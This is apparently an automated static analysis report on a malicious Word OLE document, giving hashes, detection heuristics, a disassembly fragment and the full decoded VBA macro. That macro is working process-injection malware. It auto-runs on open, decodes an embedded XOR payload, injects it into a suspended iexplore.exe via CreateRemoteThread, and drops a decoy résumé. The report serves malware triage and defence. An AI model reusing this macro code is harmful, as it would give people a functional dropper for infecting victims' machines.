Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d85e783b4594658c…

MALICIOUS

Office (OLE)

425.5 KB Created: 2019-02-19 22:10:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: d84701cf6c7dceecfd71aa9282c8d945 SHA-1: 9fd24521d2e87c445b35b5e8aa57055208e93280 SHA-256: d85e783b4594658c1df49b286dc504becfe0b23092b21e3ee08949674d01c447
508 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample exhibits critical heuristic firings for CVE-2007-3899, indicating exploitation of a Microsoft Word memory corruption vulnerability. The presence of VBA macros, specifically AutoOpen and Workbook_Open, along with calls to CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, strongly suggests the execution of injected code. The XOR-encoded strings further indicate obfuscation techniques commonly used by malware.

Heuristics 16

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Macro.Injection-6355574-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Injection-6355574-0
  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • XOR-encoded strings (key 0x5A) critical SC_XOR_ENCODED
    Found 1 Windows library/API name(s) XOR-encoded with single-byte key 0x5A: 'ADVAPI32.DLL'
    Disassembly
    Attempted x86 opcode disassembly
    00053A35  1b1e              sbb ebx, dword ptr [esi]
    00053A37  0c1b              or al, 0x1b
    00053A39  0a13              or dl, byte ptr [ebx]
    00053A3B  6968741e16165a    imul ebp, dword ptr [eax + 0x74], 0x5a16161e
    00053A42  5a                pop edx
    00053A43  5a                pop edx
    00053A44  5a                pop edx
    00053A45  3939              cmp dword ptr [ecx], edi
    00053A47  295a0f            sub dword ptr [edx + 0xf], ebx
    00053A4A  0e                push cs
    00053A4B  1c77              sbb al, 0x77
    00053A4D  625a5a            bound ebx, qword ptr [edx + 0x5a]
    00053A50  5a                pop edx
    00053A51  0f0e              femms
    00053A53  1c77              sbb al, 0x77
    00053A55  6b6c161f5a        imul ebp, dword ptr [esi + edx + 0x1f], 0x5a
    00053A5A  5a                pop edx
    00053A5B  5a                pop edx
    00053A5C  5a                pop edx
    00053A5D  0f1413            unpcklps xmm2, xmmword ptr [ebx]
    00053A60  19151e1f5a1d      sbb dword ptr [0x1d5a1f1e], edx
    00053A66  3f                aas
    00053A67  2e0a28            or ch, byte ptr cs:[eax]
    00053A6A  35393f2929        xor eax, 0x29293f39
    00053A6F  0d33343e35        or eax, 0x353e3433
    00053A74  2d092e3b2e        sub eax, 0x2e3b2e09
    00053A79  3335345a1d3f      xor esi, dword ptr [0x3f1d5a34]
    00053A7F  2e0f293f          movaps xmmword ptr cs:[edi], xmm7
    00053A83  281538303f39      sub byte ptr [0x393f3038], dl
    00053A89  2e13343c          adc esi, dword ptr cs:[esp + edi]
    00053A8D  3528373b2e        xor eax, 0x2e3b3728
    00053A92  33                .byte 0x33
    00053A93  35                .byte 0x35
    00053A94  34                .byte 0x34
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      Dim wvghsQfShk
      Set wvghsQfShk = CreateObject("ADODB.Stream")
      wvghsQfShk.Type = UkCeYErodm
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
        hKpmtdwfbcVf
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
    Sub Workbook_Open()
        hKpmtdwfbcVf
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        If Len(Environ("ProgramW6432")) > 0 Then
            MDOyCzztxUrq = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9311 bytes
SHA-256: 587c426db7189503e4ab9cced21d8f6620be462cf127b8671aabe87347d3ddc5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
85 of 149 identifiers look randomly generated (e.g. 'dtUbCrqDObPvicG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const UkCeYErodm = 1
Const YFgeuyuYOq = 1, yENVLiDmOw = 2, GgKdJHhbKy = 8

Private Type sRBvucEtdXym
    DCAxJpegGSqO As Long
    SoAPFyfaUtau As Long
    mlOOvdnudbhm As Long
    mzqTxeHBQYhb As Long
End Type

Private Type pahHkgGUkaHd
    TmwZClrhEJpP As Long
    XeiQukksbzWK As String
    oiYzPGzZzSbi As String
    YAsZdlaJIacm As String
    FDMPWIeeaDUb As Long
    WmROJrbGYVGQ As Long
    XufAvYUPRnmU As Long
    ARqHAUkYYXlS As Long
    CdvuXeDoJeDG As Long
    MzDsaDIrrkqI As Long
    TfpYViOHyTNo As Long
    sQKJAwbrptVl As Long
    VOSBtOkJEUSs As Integer
    WcVMHooiSmrR As Integer
    YXodNLJHRaio As Long
    HFaRXngmEHWs As Long
    KgUxVoSeQjMy As Long
    uGAtnjfMJXYM As Long
End Type

#If VBA7 Then
    Private Declare PtrSafe Function vYRRaPjKJcct Lib "kernel32" Alias "CreateRemoteThread" (ByVal DCAxJpegGSqO As Long, ByVal KlCGDQLHnEFf As Long, ByVal vBmxSvzOKqQL As Long, ByVal vUJelPEeCJAw As LongPtr, DoRoxgPDXTQc As Long, ByVal ktMZudZfnqcy As Long, VjsOskExXqJU As Long) As LongPtr
    Private Declare PtrSafe Function weMFAEEALOZs Lib "kernel32" Alias "VirtualAllocEx" (ByVal DCAxJpegGSqO As Long, ByVal rcPibAKGWPiv As Long, ByVal olYYRLaAcAxA As Long, ByVal PdhuJAzhZsqO As Long, ByVal osUYHPNtExGR As Long) As LongPtr
    Private Declare PtrSafe Function jspvaDVaZVXp Lib "kernel32" Alias "WriteProcessMemory" (ByVal DCAxJpegGSqO As Long, ByVal gdaYUIRWpXmw As LongPtr, ByRef zXWCLLTTeTpN As Any, ByVal cSrSAauGoQkL As Long, ByVal toaRriPmxoVv As LongPtr) As LongPtr
    Private Declare PtrSafe Function UueEbsZDAyRM Lib "kernel32" Alias "CreateProcessA" (ByVal kPBNwVgBOBbZ As String, ByVal DNuZSfCPsmWn As String, BSHcdYIDDQGa As Any, KlCGDQLHnEFf As Any, ByVal ZbNcIOBIaDxo As Long, ByVal ktMZudZfnqcy As Long, DDKtJlRVKPCk As Any, ByVal KyFIKwEtxLQd As String, WsdDSUOgFbIj As pahHkgGUkaHd, zJRAtIMNtCRN As sRBvucEtdXym) As Long
#Else
    Private Declare Function vYRRaPjKJcct Lib "kernel32" Alias "CreateRemoteThread" (ByVal DCAxJpegGSqO As Long, ByVal KlCGDQLHnEFf As Long, ByVal vBmxSvzOKqQL As Long, ByVal vUJelPEeCJAw As Long, DoRoxgPDXTQc As Long, ByVal ktMZudZfnqcy As Long, VjsOskExXqJU As Long) As Long
    Private Declare Function weMFAEEALOZs Lib "kernel32" Alias "VirtualAllocEx" (ByVal DCAxJpegGSqO As Long, ByVal rcPibAKGWPiv As Long, ByVal olYYRLaAcAxA As Long, ByVal PdhuJAzhZsqO As Long, ByVal osUYHPNtExGR As Long) As Long
    Private Declare Function jspvaDVaZVXp Lib "kernel32" Alias "WriteProcessMemory" (ByVal DCAxJpegGSqO As Long, ByVal gdaYUIRWpXmw As Long, ByRef zXWCLLTTeTpN As Any, ByVal cSrSAauGoQkL As Long, ByVal toaRriPmxoVv As Long) As Long
    Private Declare Function UueEbsZDAyRM Lib "kernel32" Alias "CreateProcessA" (ByVal kPBNwVgBOBbZ As String, ByVal DNuZSfCPsmWn As String, BSHcdYIDDQGa As Any, KlCGDQLHnEFf As Any, ByVal ZbNcIOBIaDxo As Long, ByVal ktMZudZfnqcy As Long, DDKtJlRVKPCk As Any, ByVal lpCurrentDriectory As String, WsdDSUOgFbIj As pahHkgGUkaHd, zJRAtIMNtCRN As sRBvucEtdXym) As Long
#End If

Sub hKpmtdwfbcVf()
    Dim AvbfMfOlMFUK As Long, CrnrWEgIYXnR As Variant, aybCpsxMPOMS As Long
    Dim eYJMjndWliMH As sRBvucEtdXym
    Dim NDRydauLrGFq As pahHkgGUkaHd
    Dim mixcHUtJfDZv As String
    Dim MDOyCzztxUrq As String
    Dim AjBvdifzXQ As String
    Dim RTiRHpQQIX() As Byte
    Dim hHPJyGviet As Boolean
    
#If VBA7 Then
    Dim DiaisoMVOzOL As LongPtr, lYlWHXgjcPLq As LongPtr
#Else
    Dim DiaisoMVOzOL As Long, lYlWHXgjcPLq As Long
#End If
    CrnrWEgIYXnR = vbhibywu

    If Len(Environ("ProgramW6432")) > 0 Then
        MDOyCzztxUrq = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
    Else
        MDOyCzztxUrq = Environ("PROGRAMFILES") & "\internet explorer\iexplore.exe"
    End If

    lYlWHXgjcPLq = UueEbsZDAyRM(mixcHUtJfDZv, MDOyCzztxUrq, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, mixcHUtJfDZv, NDRydauLrGFq, eYJMjndWliMH)

    DiaisoMVOzOL = weMFAEEALOZs(eYJMjndWliMH.DCAxJpegGSqO, 0, UBound(CrnrWEgIYXnR), &H1000, &H40)
    For aybCpsxMPOMS = LBound(CrnrWEgIYXnR) To UBound(CrnrWEgIYXnR)
        AvbfMfOlMFUK = CrnrWEgIYXnR(aybCpsxMPOMS)
        lYlWHXgjcPLq = jspvaDVaZVXp(eYJMjndWliMH.DCAxJpegGSqO, DiaisoMVOzOL + aybCpsxMPOMS, AvbfMfOlMFUK, 1, ByVal 0&)
    Next aybCpsxMPOMS
    lYlWHXgjcPLq = vYRRaPjKJcct(eYJMjndWliMH.DCAxJpegGSqO, 0, 0, DiaisoMVOzOL, 0, 0, 0)
    
    AjBvdifzXQ = Environ("TEMP") & "\Candidate-Resume-2019.doc"
    RTiRHpQQIX = wdablndx
    hHPJyGviet = TnmOqfNvca(AjBvdifzXQ, RTiRHpQQIX)
    
    Set temp = ActiveDocument
    Documents.Open (AjBvdifzXQ)
    temp.Close SaveChanges:=wdDoNotSaveChanges
End Sub

Function TnmOqfNvca(nMhfWtYRnw, uffNizKKSN)
  Dim wvghsQfShk
  Set wvghsQfShk = CreateObject("ADODB.Stream")
  wvghsQfShk.Type = UkCeYErodm

  wvghsQfShk.Open
  wvghsQfShk.Write uffNizKKSN

  wvghsQfShk.SaveToFile nMhfWtYRnw, yENVLiDmOw
End Function

Sub AutoOpen()
    hKpmtdwfbcVf
End Sub
Sub Workbook_Open()
    hKpmtdwfbcVf
End Sub


Function vbhibywu() As Byte()
    Dim FHwuMmFxNTAMpys() As Byte
    Dim rjRyGoggFXixUjV As Long
    Dim dtUbCrqDObPvicG(7) As Byte
    Dim aybCpsxMPOMS As Long
    Dim iFmMPheuhFDGdlH() As Byte
    Dim hHPJyGviet As Boolean
    
    FHwuMmFxNTAMpys = UEpQaymsbv(ActiveDocument.FullName)
    rjRyGoggFXixUjV = UWJEcrrGZt(FHwuMmFxNTAMpys)
    
    
        dtUbCrqDObPvicG(0) = 57
    
        dtUbCrqDObPvicG(1) = 78
    
        dtUbCrqDObPvicG(2) = 82
    
        dtUbCrqDObPvicG(3) = 67
    
        dtUbCrqDObPvicG(4) = 74
    
        dtUbCrqDObPvicG(5) = 89
    
        dtUbCrqDObPvicG(6) = 84
    
        dtUbCrqDObPvicG(7) = 89

    
    aybCpsxMPOMS = jtGHjgeTHO(FHwuMmFxNTAMpys, dtUbCrqDObPvicG)
    iFmMPheuhFDGdlH = LrnUaWJVtv(FHwuMmFxNTAMpys, aybCpsxMPOMS + UWJEcrrGZt(dtUbCrqDObPvicG), 212481 - 1)
    hHPJyGviet = dPYqsoWost(iFmMPheuhFDGdlH, UWJEcrrGZt(iFmMPheuhFDGdlH))
    
    vbhibywu = iFmMPheuhFDGdlH
End Function

Function wdablndx() As Byte()
    Dim FHwuMmFxNTAMpys() As Byte
    Dim rjRyGoggFXixUjV As Long
    Dim dtUbCrqDObPvicG(7) As Byte
    Dim aybCpsxMPOMS As Long
    Dim iFmMPheuhFDGdlH() As Byte
    Dim hHPJyGviet As Boolean
    
    FHwuMmFxNTAMpys = UEpQaymsbv(ActiveDocument.FullName)
    rjRyGoggFXixUjV = UWJEcrrGZt(FHwuMmFxNTAMpys)
    
    
        dtUbCrqDObPvicG(0) = 55
    
        dtUbCrqDObPvicG(1) = 74
    
        dtUbCrqDObPvicG(2) = 65
    
        dtUbCrqDObPvicG(3) = 71
    
        dtUbCrqDObPvicG(4) = 82
    
        dtUbCrqDObPvicG(5) = 56
    
        dtUbCrqDObPvicG(6) = 79
    
        dtUbCrqDObPvicG(7) = 68

    
    aybCpsxMPOMS = jtGHjgeTHO(FHwuMmFxNTAMpys, dtUbCrqDObPvicG)
    iFmMPheuhFDGdlH = LrnUaWJVtv(FHwuMmFxNTAMpys, aybCpsxMPOMS + UWJEcrrGZt(dtUbCrqDObPvicG), 93184 - 1)
    hHPJyGviet = dPYqsoWost(iFmMPheuhFDGdlH, UWJEcrrGZt(iFmMPheuhFDGdlH))
    
    wdablndx = iFmMPheuhFDGdlH
End Function

Function UWJEcrrGZt(abArray() As Byte) As Long
    Dim nLen As Long
    UWJEcrrGZt = UBound(abArray) - LBound(abArray) + 1
End Function

Function UEpQaymsbv(ayPYliBNVT As String)
    Dim zJxZXxCHca() As Byte
    Dim ptYMxfMkoa As Integer: ptYMxfMkoa = FreeFile
    
    Open ayPYliBNVT For Binary Access Read As #ptYMxfMkoa
    ReDim zJxZXxCHca(0 To LOF(ptYMxfMkoa) - 1)
    Get #ptYMxfMkoa, , zJxZXxCHca
    Close #ptYMxfMkoa
    
    UEpQaymsbv = zJxZXxCHca
End Function

Function jtGHjgeTHO(pfvlQrqety() As Byte, nBuYVYWNNO() As Byte) As Long
    Dim zyabobJmqN As Boolean
    Dim uBgkizOBng As Long
    Dim LWnVcvGgUK As Long
    Dim tQNVJeQqRk As Long
    Dim kxKDAWkaFs As Long
    
    zyabobJmqN = False
    tQNVJeQqRk = UWJEcrrGZt(pfvlQrqety)
    kxKDAWkaFs = UWJEcrrGZt(nBuYVYWNNO)
    For uBgkizOBng = 0 To tQNVJeQqRk
        zyabobJmqN = True
        For LWnVcvGgUK = 0 To kxKDAWkaFs - 1
                If pfvlQrqety(uBgkizOBng + LWnVcvGgUK) <> nBuYVYWNNO(LWnVcvGgUK) Then
                    zyabobJmqN = False
                    Exit For
                End If
        Next LWnVcvGgUK
        If zyabobJmqN = True Then
            Exit For
        End If
    Next uBgkizOBng
    
    If zyabobJmqN = False Then
        jtGHjgeTHO = -1
    Else
        jtGHjgeTHO = uBgkizOBng
    End If
    
End Function

Function LrnUaWJVtv(pfvlQrqety() As Byte, xMZyrXvMCa As Long, eIbEiKWFpb As Long) As Byte()
    Dim jHrsfbohVM() As Byte
    Dim uBgkizOBng As Long

    For uBgkizOBng = 0 To eIbEiKWFpb
        ReDim Preserve jHrsfbohVM(uBgkizOBng)
        jHrsfbohVM(uBgkizOBng) = pfvlQrqety(xMZyrXvMCa + uBgkizOBng)
    Next uBgkizOBng
    
    LrnUaWJVtv = jHrsfbohVM
End Function

Function dPYqsoWost(aLroiYYqoh() As Byte, eIbEiKWFpb As Long)
    
    Dim MdvQvXHAeI As Byte
    Dim mLwgcnLowc As Long
    MdvQvXHAeI = 90
    
    For mLwgcnLowc = 0 To eIbEiKWFpb - 1
        aLroiYYqoh(mLwgcnLowc) = aLroiYYqoh(mLwgcnLowc) Xor MdvQvXHAeI
    Next mLwgcnLowc
    
End Function
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1612090647/Ole10Native 212955 bytes
SHA-256: bdb813ee80f9f95855db02e810e4e51d75009a7b4e76d641f2e2f93bf7707166
ole10native_01.bin ole-package OLE Ole10Native stream: ObjectPool/_1612090648/Ole10Native 93658 bytes
SHA-256: c94978050593ac6cced76ff449533df0c13a2dd7ecdfee9e6796561f584b54ec